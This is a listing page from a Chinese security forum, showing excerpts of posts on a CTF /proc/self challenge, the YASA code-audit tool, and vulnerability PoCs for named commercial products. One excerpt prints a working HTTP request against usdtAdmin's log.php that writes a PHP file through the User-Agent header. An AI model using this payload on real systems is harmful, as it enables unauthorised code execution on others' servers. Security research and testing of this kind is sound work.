Linux的/proc/self学习(CTF实践)_秃兔安全

Linux的/proc/self学习(CTF实践)

本题来自JLU SpiritCTF热身赛(level4)题目源码是nginx.config文件,考点是nginx下的lua库worker_processes 1; events { use epoll; worker_connections 10240; } http { include mime.types; ...
chiyu的头像_秃兔安全至尊玉兔chiyu4天前
06515
基于YASA程序分析研究(前置知识学习 1.0)_秃兔安全

基于YASA程序分析研究(前置知识学习 1.0)

蚂蚁集团的YASA Enigne  v0.2.1开源了。其提供了一种静态审计代码I/O流安全性的的新方法。核心概念解释首先,需要理解静态应用程序安全测试(SAST) 工具(如 YASA)的基本工作流程:它们通过...
Linux的/proc/self/学习(理论)_秃兔安全

Linux的/proc/self/学习(理论)

/proc目录Linux 内核提供了一种通过 /proc 文件系统,在运行时访问内核内部数据结构、改变内核设置的机制。proc文件系统是一个伪文件系统,它只存在内存当中,而不占用外存空间。它以文件系统...
chiyu的头像_秃兔安全至尊玉兔chiyu5天前
07913
dadd 20250814 更新_秃兔安全

dadd 20250814 更新

更新dadd最近2个月的poc和指纹,目前所有poc约增加1106个 
dreamer292的头像_秃兔安全至尊玉兔dreamer29233天前
06115
【通用】天锐绿盘云文档安全管理uploadFolder 文件上传_秃兔安全
【通用】usdtAdmin收款管理系统log.php 任意文件写入_秃兔安全

【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...
dreamer292的头像_秃兔安全至尊玉兔dreamer29233天前
0737
【通用】弥特科技全流程追溯系统geticp sqli_秃兔安全

【通用】弥特科技全流程追溯系统geticp sqli

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer29233天前
0636
【通用】天锐绿盾审批系统 uploadWxFile.do  文件上传_秃兔安全

【通用】天锐绿盾审批系统 uploadWxFile.do 文件上传

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer29233天前
0385
【通用】Vacron NVR-board RCE_秃兔安全

【通用】Vacron NVR-board RCE

fofa语句yakit插件 uuidpocyaml已验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer29234天前
05115
【通用】安数云综合日志分析系统 assetScanns RCE_秃兔安全

【通用】安数云综合日志分析系统 assetScanns RCE

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer29235天前
0418
攻防演练 & 红蓝对抗 & 其他文库
红队文库
涵盖常规系统命令、常见工具命令、内网渗透命令、渗透测试常用命令、远程控制常用命令等;达五十万字
10篇文章更多文章
高级资源版块:签到即免费领积分